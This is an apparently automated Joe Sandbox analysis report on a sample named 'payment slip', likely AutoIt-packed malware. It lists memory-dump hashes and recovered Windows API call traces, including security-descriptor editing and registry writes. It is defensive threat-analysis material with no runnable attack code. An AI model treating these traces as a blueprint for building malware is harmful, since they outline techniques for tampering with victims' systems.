                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a8e4357ab3c8a57c981b1d30111489f98149e4bb5e88608590cdeaadeb2408fb
                                        • Instruction ID: 1c239922c3d26797c019bb7979dd0dd58b6d849e8d3d07f815208a87b5e22845
                                        • Opcode Fuzzy Hash: a8e4357ab3c8a57c981b1d30111489f98149e4bb5e88608590cdeaadeb2408fb
                                        • Instruction Fuzzy Hash: C661577160870956FAB49928B899BFF23D8DF81303F144919ED4EDB282DB119E4EF316
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 92faed252fab2b1ed0da5c4990537c3eb28ffdf3ffc8083932d3c14b94231105
                                        • Instruction ID: 0974ede9832ee465892a7d7a63a0bbe8f64f14fc9af6c71efb813052626904df
                                        • Opcode Fuzzy Hash: 92faed252fab2b1ed0da5c4990537c3eb28ffdf3ffc8083932d3c14b94231105
                                        • Instruction Fuzzy Hash: BB615A7120870956DEB84928785ABBF23F8DF45703F104959EC4BDB282EA129D4EF365
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                        • Instruction ID: 7da379901184674684e3663439507fe453b54dbc7ea72cad7aa46965708e76ad
                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                        • Instruction Fuzzy Hash: BC81547250D0A309DBA9423D85346BFFFE15F923A371A079DD8F2CA1C1EE24995CD620
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 54e8de44450efe65827671db54f4fe2cbb08945deb3b9e9e29b44440e2d0001e
                                        • Instruction ID: 09edbdb4bc4fdd216f7a3e9914ef2cb1cb304785a4d519dae52ca4d7d8ee5d11
                                        • Opcode Fuzzy Hash: 54e8de44450efe65827671db54f4fe2cbb08945deb3b9e9e29b44440e2d0001e
                                        • Instruction Fuzzy Hash: DF21B7326206118BD728CF79C823A7E73E5AB54310F15862EE4A7C37D1DE7AA944CB80
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 000B2B30
                                        • DeleteObject.GDI32(00000000), ref: 000B2B43
                                        • DestroyWindow.USER32 ref: 000B2B52
                                        • GetDesktopWindow.USER32 ref: 000B2B6D
                                        • GetWindowRect.USER32(00000000), ref: 000B2B74
                                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 000B2CA3
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 000B2CB1
                                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2CF8
                                        • GetClientRect.USER32(00000000,?), ref: 000B2D04
                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 000B2D40
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2D62
                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2D75
                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2D80
                                        • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2D89
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2D98
                                        • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2DA1
                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2DA8
                                        • GlobalFree.KERNEL32(00000000), ref: 000B2DB3
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2DC5
                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,000CFC38,00000000), ref: 000B2DDB
                                        • GlobalFree.KERNEL32(00000000), ref: 000B2DEB
                                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 000B2E11
                                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 000B2E30
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2E52
                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B303F
                                        Strings
                                        • String ID: $AutoIt v3$DISPLAY$static
                                        APIs
                                        • SetTextColor.GDI32(?,00000000), ref: 000C712F
                                        • GetSysColorBrush.USER32(0000000F), ref: 000C7160
                                        • GetSysColor.USER32(0000000F), ref: 000C716C
                                        • SetBkColor.GDI32(?,000000FF), ref: 000C7186
                                        • SelectObject.GDI32(?,?), ref: 000C7195
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 000C71C0
                                        • GetSysColor.USER32(00000010), ref: 000C71C8
                                        • CreateSolidBrush.GDI32(00000000), ref: 000C71CF
                                        • FrameRect.USER32(?,?,00000000), ref: 000C71DE
                                        • DeleteObject.GDI32(00000000), ref: 000C71E5
                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 000C7230
                                        • FillRect.USER32(?,?,?), ref: 000C7262
                                        • GetWindowLongW.USER32(?,000000F0), ref: 000C7284
                                          • Part of subcall function 000C73E8: GetSysColor.USER32(00000012), ref: 000C7421
                                          • Part of subcall function 000C73E8: SetTextColor.GDI32(?,?), ref: 000C7425
                                          • Part of subcall function 000C73E8: GetSysColorBrush.USER32(0000000F), ref: 000C743B
                                          • Part of subcall function 000C73E8: GetSysColor.USER32(0000000F), ref: 000C7446
                                          • Part of subcall function 000C73E8: GetSysColor.USER32(00000011), ref: 000C7463
                                          • Part of subcall function 000C73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 000C7471
                                          • Part of subcall function 000C73E8: SelectObject.GDI32(?,00000000), ref: 000C7482
                                          • Part of subcall function 000C73E8: SetBkColor.GDI32(?,00000000), ref: 000C748B
                                          • Part of subcall function 000C73E8: SelectObject.GDI32(?,?), ref: 000C7498
                                          • Part of subcall function 000C73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 000C74B7
                                          • Part of subcall function 000C73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000C74CE
                                          • Part of subcall function 000C73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 000C74DB
                                        APIs
                                        • DestroyWindow.USER32(?,?), ref: 00048E14
                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00086AC5
                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00086AFE
                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00086F43
                                          • Part of subcall function 00048F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00048BE8,?,00000000,?,?,?,?,00048BBA,00000000,?), ref: 00048FC5
                                        • SendMessageW.USER32(?,00001053), ref: 00086F7F
                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00086F96
                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00086FAC
                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00086FB7
                                        Strings
                                        • String ID: U$0
                                        APIs
                                        • DestroyWindow.USER32(00000000), ref: 000B273E
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 000B286A
                                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 000B28A9
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 000B28B9
                                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 000B2900
                                        • GetClientRect.USER32(00000000,?), ref: 000B290C
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 000B2955
                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 000B2964
                                        • GetStockObject.GDI32(00000011), ref: 000B2974
                                        • SelectObject.GDI32(00000000,00000000), ref: 000B2978
                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 000B2988
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000B2991
                                        • DeleteDC.GDI32(00000000), ref: 000B299A
                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 000B29C6
                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 000B29DD
                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 000B2A1D
                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 000B2A31
                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 000B2A42
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 000B2A77
                                        • GetStockObject.GDI32(00000011), ref: 000B2A82
                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 000B2A8D
                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 000B2A97
                                        Strings
                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 000A4AED
                                        • GetDriveTypeW.KERNEL32(?,000CCB68,?,\\.\,000CCC08), ref: 000A4BCA
                                        • SetErrorMode.KERNEL32(00000000,000CCB68,?,\\.\,000CCC08), ref: 000A4D36
                                        Strings
                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                        • API String ID: 2907320926-4222207086
                                        • Opcode ID: 8b68adb0088009ce437abaca189d7e5eb88377eb48b2e70b010199bcdec8ab02
                                        • Instruction ID: 10aaf39bc2af0a52dc51ec76496237a865259de0f69f58e2db9fd165dcb0ac8f
                                        • Opcode Fuzzy Hash: 8b68adb0088009ce437abaca189d7e5eb88377eb48b2e70b010199bcdec8ab02
                                        • Instruction Fuzzy Hash: F8613738701209DBCB54DFA4C982DBC77B1EB86310B248015FA0AAFA52CBF6DD45EB51
                                        APIs
                                        • GetSysColor.USER32(00000012), ref: 000C7421
                                        • SetTextColor.GDI32(?,?), ref: 000C7425
                                        • GetSysColorBrush.USER32(0000000F), ref: 000C743B
                                        • GetSysColor.USER32(0000000F), ref: 000C7446
                                        • CreateSolidBrush.GDI32(?), ref: 000C744B
                                        • GetSysColor.USER32(00000011), ref: 000C7463
                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 000C7471
                                        • SelectObject.GDI32(?,00000000), ref: 000C7482
                                        • SetBkColor.GDI32(?,00000000), ref: 000C748B
                                        • SelectObject.GDI32(?,?), ref: 000C7498
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 000C74B7
                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000C74CE
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 000C74DB
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000C752A
                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 000C7554
                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 000C7572
                                        • DrawFocusRect.USER32(?,?), ref: 000C757D
                                        • GetSysColor.USER32(00000011), ref: 000C758E
                                        • SetTextColor.GDI32(?,00000000), ref: 000C7596
                                        • DrawTextW.USER32(?,000C70F5,000000FF,?,00000000), ref: 000C75A8
                                        • SelectObject.GDI32(?,?), ref: 000C75BF
                                        • DeleteObject.GDI32(?), ref: 000C75CA
                                        • SelectObject.GDI32(?,?), ref: 000C75D0
                                        • DeleteObject.GDI32(?), ref: 000C75D5
                                        • SetTextColor.GDI32(?,?), ref: 000C75DB
                                        • SetBkColor.GDI32(?,?), ref: 000C75E5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                        • String ID:
                                        • API String ID: 1996641542-0
                                        • Opcode ID: 5c63a9413e3c2f695e97e7cc73928f55a474da9991355c495c572e6488a0af57
                                        • Instruction ID: 89af01db6535885ef6a9f1e38068d1232e0dfc0a84c58ae744231a97ce497f02
                                        • Opcode Fuzzy Hash: 5c63a9413e3c2f695e97e7cc73928f55a474da9991355c495c572e6488a0af57
                                        • Instruction Fuzzy Hash: 00615C72900218AFEF119FA4DC49EEEBFB9EB09320F154115FA19AB2A1D7749940CF90
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 000C1128
                                        • GetDesktopWindow.USER32 ref: 000C113D
                                        • GetWindowRect.USER32(00000000), ref: 000C1144
                                        • GetWindowLongW.USER32(?,000000F0), ref: 000C1199
                                        • DestroyWindow.USER32(?), ref: 000C11B9
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 000C11ED
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000C120B
                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 000C121D
                                        • SendMessageW.USER32(00000000,00000421,?,?), ref: 000C1232
                                        • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 000C1245
                                        • IsWindowVisible.USER32(00000000), ref: 000C12A1
                                        • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 000C12BC
                                        • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 000C12D0
                                        • GetWindowRect.USER32(00000000,?), ref: 000C12E8
                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 000C130E
                                        • GetMonitorInfoW.USER32(00000000,?), ref: 000C1328
                                        • CopyRect.USER32(?,?), ref: 000C133F
                                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 000C13AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                        • String ID: ($0$tooltips_class32
                                        • API String ID: 698492251-4156429822
                                        • Opcode ID: 4783d556c4735a6cd596822aac5b6f5db8ea4c01ce55ba74044ed1ef4784eb78
                                        • Instruction ID: 583ff4e4d209f3c7b39da738ba360cc94d4f103e2d1c4e01fd9bffe855240aa2
                                        • Opcode Fuzzy Hash: 4783d556c4735a6cd596822aac5b6f5db8ea4c01ce55ba74044ed1ef4784eb78
                                        • Instruction Fuzzy Hash: E9B17971608341AFE754DF64C984FAEBBE4EF85354F00891CF9999B2A2C771E844CB92
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 000C02E5
                                        • _wcslen.LIBCMT ref: 000C031F
                                        • _wcslen.LIBCMT ref: 000C0389
                                        • _wcslen.LIBCMT ref: 000C03F1
                                        • _wcslen.LIBCMT ref: 000C0475
                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 000C04C5
                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000C0504
                                          • Part of subcall function 0004F9F2: _wcslen.LIBCMT ref: 0004F9FD
                                          • Part of subcall function 0009223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00092258
                                          • Part of subcall function 0009223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0009228A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                        • API String ID: 1103490817-719923060
                                        • Opcode ID: 34ff098c18a4279891e6849fd297310360746085db5f4c847ad64f49d454ff59
                                        • Instruction ID: f6c12ee4ae517cdf41a5cddee91d79002ff1185d3080e4df25c9649689fa57b7
                                        • Opcode Fuzzy Hash: 34ff098c18a4279891e6849fd297310360746085db5f4c847ad64f49d454ff59
                                        • Instruction Fuzzy Hash: 6EE19D71208601DBCB24DF24C551E7EB3E5BF88314F54496CF99A9B6A2DB30ED45CB82
                                        APIs
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00048968
                                        • GetSystemMetrics.USER32(00000007), ref: 00048970
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0004899B
                                        • GetSystemMetrics.USER32(00000008), ref: 000489A3
                                        • GetSystemMetrics.USER32(00000004), ref: 000489C8
                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000489E5
                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000489F5
                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00048A28
                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00048A3C
                                        • GetClientRect.USER32(00000000,000000FF), ref: 00048A5A
                                        • GetStockObject.GDI32(00000011), ref: 00048A76
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00048A81
                                          • Part of subcall function 0004912D: GetCursorPos.USER32(?), ref: 00049141
                                          • Part of subcall function 0004912D: ScreenToClient.USER32(00000000,?), ref: 0004915E
                                          • Part of subcall function 0004912D: GetAsyncKeyState.USER32(00000001), ref: 00049183
                                          • Part of subcall function 0004912D: GetAsyncKeyState.USER32(00000002), ref: 0004919D
                                        • SetTimer.USER32(00000000,00000000,00000028,000490FC), ref: 00048AA8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                        • String ID: AutoIt v3 GUI
                                        • API String ID: 1458621304-248962490
                                        • Opcode ID: d3ff73f02ae6353e1c4a30d9d80a60c3ff4733ea924db5dc4b9110b89d541bce
                                        • Instruction ID: c7dd7c9e7d2c053a71ae1f9d1ce0314c0c1da3cc987d3d7e30c8f0ae1640681a
                                        • Opcode Fuzzy Hash: d3ff73f02ae6353e1c4a30d9d80a60c3ff4733ea924db5dc4b9110b89d541bce
                                        • Instruction Fuzzy Hash: 7EB19E71A00209EFEB14DFA8CD45FAE3BB5FB48314F118229FA55A7290DB74E841CB55
                                        APIs
                                          • Part of subcall function 000910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00091114
                                          • Part of subcall function 000910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091120
                                          • Part of subcall function 000910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 0009112F
                                          • Part of subcall function 000910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091136
                                          • Part of subcall function 000910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0009114D
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00090DF5
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00090E29
                                        • GetLengthSid.ADVAPI32(?), ref: 00090E40
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00090E7A
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00090E96
                                        • GetLengthSid.ADVAPI32(?), ref: 00090EAD
                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00090EB5
                                        • HeapAlloc.KERNEL32(00000000), ref: 00090EBC
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00090EDD
                                        • CopySid.ADVAPI32(00000000), ref: 00090EE4
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00090F13
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00090F35
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00090F47
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090F6E
                                        • HeapFree.KERNEL32(00000000), ref: 00090F75
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090F7E
                                        • HeapFree.KERNEL32(00000000), ref: 00090F85
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090F8E
                                        • HeapFree.KERNEL32(00000000), ref: 00090F95
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00090FA1
                                        • HeapFree.KERNEL32(00000000), ref: 00090FA8
                                          • Part of subcall function 00091193: GetProcessHeap.KERNEL32(00000008,00090BB1,?,00000000,?,00090BB1,?), ref: 000911A1
                                          • Part of subcall function 00091193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00090BB1,?), ref: 000911A8
                                          • Part of subcall function 00091193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00090BB1,?), ref: 000911B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                        • String ID:
                                        • API String ID: 4175595110-0
                                        • Opcode ID: dfad3d31c0851d7322c708b073b44debc4897e4e52087dd29384a697bb5b9cf5
                                        • Instruction ID: 8aa25acf5d8b18ff0e564f04a6c7e099aa5fbe87e547e95e3cfe678029aad0e0
                                        • Opcode Fuzzy Hash: dfad3d31c0851d7322c708b073b44debc4897e4e52087dd29384a697bb5b9cf5
                                        • Instruction Fuzzy Hash: 7171487290020AAFEF60DFA5DC48FEEBBB8FF05310F148125F919A6191D7759A05DB60
                                        APIs
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000BC4BD
                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,000CCC08,00000000,?,00000000,?,?), ref: 000BC544
                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 000BC5A4
                                        • _wcslen.LIBCMT ref: 000BC5F4
                                        • _wcslen.LIBCMT ref: 000BC66F
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 000BC6B2
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 000BC7C1
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 000BC84D
                                        • RegCloseKey.ADVAPI32(?), ref: 000BC881
                                        • RegCloseKey.ADVAPI32(00000000), ref: 000BC88E
